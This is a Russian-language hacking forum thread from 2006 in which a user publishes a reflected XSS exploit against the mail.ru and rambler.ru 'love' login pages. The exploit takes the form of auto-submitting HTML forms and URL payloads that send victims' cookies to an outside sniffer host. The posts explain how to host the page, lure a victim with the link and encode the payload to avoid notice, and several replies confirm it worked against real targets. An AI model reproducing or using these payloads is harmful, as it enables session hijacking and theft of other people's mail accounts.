XSS mail.ru rambler.ru

Discussion in 'Уязвимости Mail-сервисов' started by slider, 4 Dec 2006.

  1. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Гы гы ... долго же вы ждали темы как ломать эти почтовики =)

    Старый добрый дядя slider вам расскроет тайну :)Да.. да... прям возьмём и угоним сессию..

    Короче ... дело было вечером .. делать было нечего..
    и полез я искать уязвимости на этих почтовиках..


    После многих часов поиска (уважайте чужой труд! ;) ) нашол таки...
    в файле http://love.mail.ru/my/login.phtml скрытую строку:
    HTML:
    <input type="hidden" name="tcurl">
    Да да... именно она слабое звено!...
    паразитка такая не фильтруетсо =)

    вбил я в нее "><script>alert()</script> и вылез заветный алерт!..


    А вот тут по сценарию вам надо дать exploit ))
    С переадрессацией и со всеми наворотами ))

    А вот он б*я =)

    майл.ru

    HTML:
    <body onload="p.submit()">
    <form action="http://love.mail.ru/my/login.phtml" method="post" id="p">
    <input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.mail.ru")</script>'>
    рамблер.ru


    HTML:
    <body onload="p.submit()">
    <form action="http://love.rambler.ru/my/login.phtml" method="post" id="p">
    <input type="hidden" name="tcurl" value='"><script>img = new Image(); img.src = "http://antichat.ru/s/сниффер.gif?"+document.cookie;</script><script>navigate("http://love.rambler.ru")</script>'>

    СПРОСИТЕ ВЫ А ПРИЧЁМ ТУТ ПОЧТОВИК mail.ru и rambler.ru ?

    А вот причём... кука прийдёт и от лов и от майла! =)
    Так что статейка думаю многим пригодистя =)

    Ну что.. время пошло кто не успел тот опоздал... =)
    Торопитесь время акции ограничего =)


    С уважением
    slider


    Ахх да... как юзать ))
    Сохраняете этот "сплойт" в html и качаете на народ.ru
    далее даёте ссылку комунить на свой "скрипт"... ))
    Удачи!..


    Вот вам ещё скриптеГ =)

    HTML:
    http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>
    Чтоб было меньше палева .. кодируем это .. и получисо чтот типа того!..

    HTML:
    http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E
     
    #1 slider, 4 Dec 2006
    Last edited: 5 Dec 2006
    14 people like this.
  2. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Засекаем время сколько бага проживет =)
     
  3. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Отпишитесь хоть.. КОМУ пригодилось! =)
     
  4. [loy]

    [loy] Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    126
    Likes Received:
    23
    Reputations:
    16
    http://love.mail.ru/my/login.phtml?tcurl=%22%3E%3Cscript%3Ealert('12');%3C/script%3E%22!--%3C

    или так http://love.mail.ru/my/login.phtml?tcurl="><script>document.location='http://forum.antichat.ru';</script><!--"
    <a href='http://love.mail.ru/my/login.phtml?tcurl="><script>document.location=\'http://forum.antichat.ru\'</script><!--"'>ФОрум</a>

    я конечно не понял точно как сделал слайдер
    но вот как я сделел
     
    #4 [loy], 4 Dec 2006
    Last edited: 4 Dec 2006
  5. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    Мда только жаль что я ен умею этим пользоваться..
     
  6. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    "Торопитесь время акции ограничего =)"
    Мда
     
    1 person likes this.
  7. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>

    И так можно использовать!!! =)
    но это как то банально!
     
    #7 slider, 4 Dec 2006
    Last edited: 4 Dec 2006
  8. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Я что-то не понял это активная XSS, и где надо запостить этот текст http://love.mail.ru/my/login.phtml?tcurl="><script>navigate('http://antichat.org/s/ВАШ СНИФФЕР.gif?'.concat(document.cookie))</script>?
    Извените за тупые вопросы просто с XSS плохо разбираюсь.
     
  9. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    Обычная пассивная xss
    Жертва должна перейти по ссылке, либо быть перенаправленной на нее
     
    2 people like this.
  10. xzz

    xzz New Member

    Joined:
    6 Nov 2006
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Только что опробовал, сделал все как по учебнику ,скрипт вроде рабочий,..но мля куки на снифер не летят.
    Кто нить знает в чем причина? В снифере, как была одна запись ...так одна и есть. Mожет я не правильно снифер зарегал ? В " Картинка" что нано писать? Изаиняюсь за дебильные вопросы........ :confused:
     
    #10 xzz, 4 Dec 2006
    Last edited: 4 Dec 2006
  11. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    Походу плюсик начал фильтроваться ;)
    Вернее + просто вырезается, а если пытаешься замаскировать, то отрезается все что идет после плюса.
     
    #11 Abra, 4 Dec 2006
    Last edited: 4 Dec 2006
  12. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    НАврал - простое урл шифрование плюса и все катит.
     
    #12 Abra, 4 Dec 2006
    Last edited: 4 Dec 2006
  13. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    эх жаль в письме низя"ВНИМАНИЕ!
    Данное письмо содержит потенциально опасный Html-код,
    заблокированный автоматической системой безопасности."
    а то ссылку давать не каждый пойдёт-то...
     
  14. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Пробовал! Пашет! Пока бага актуальна!
     
  15. xzz

    xzz New Member

    Joined:
    6 Nov 2006
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Все,.. пашет! Спасибо Slider ! Наконец то я достал врага.




    Сам ты чайник....я просто покурил вчера больше чем надо...
     
    1 person likes this.
  16. wano81

    wano81 New Member

    Joined:
    23 Oct 2006
    Messages:
    25
    Likes Received:
    4
    Reputations:
    5
    а никто не подскажет какой нить альтернативный сниффер просто я никак не могу завести свой на античате
     
  17. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    http://xss.netsec.ru
     
  18. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    Респект...Sliderу
     
  19. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Гы гы... значит всё таки не зря старалсо! =)
     
    2 people like this.
  20. CRL

    CRL Active Member

    Joined:
    21 Oct 2006
    Messages:
    47
    Likes Received:
    102
    Reputations:
    12
    Красавец!!!!!!!!!! Супер! Отлично
     
    1 person likes this.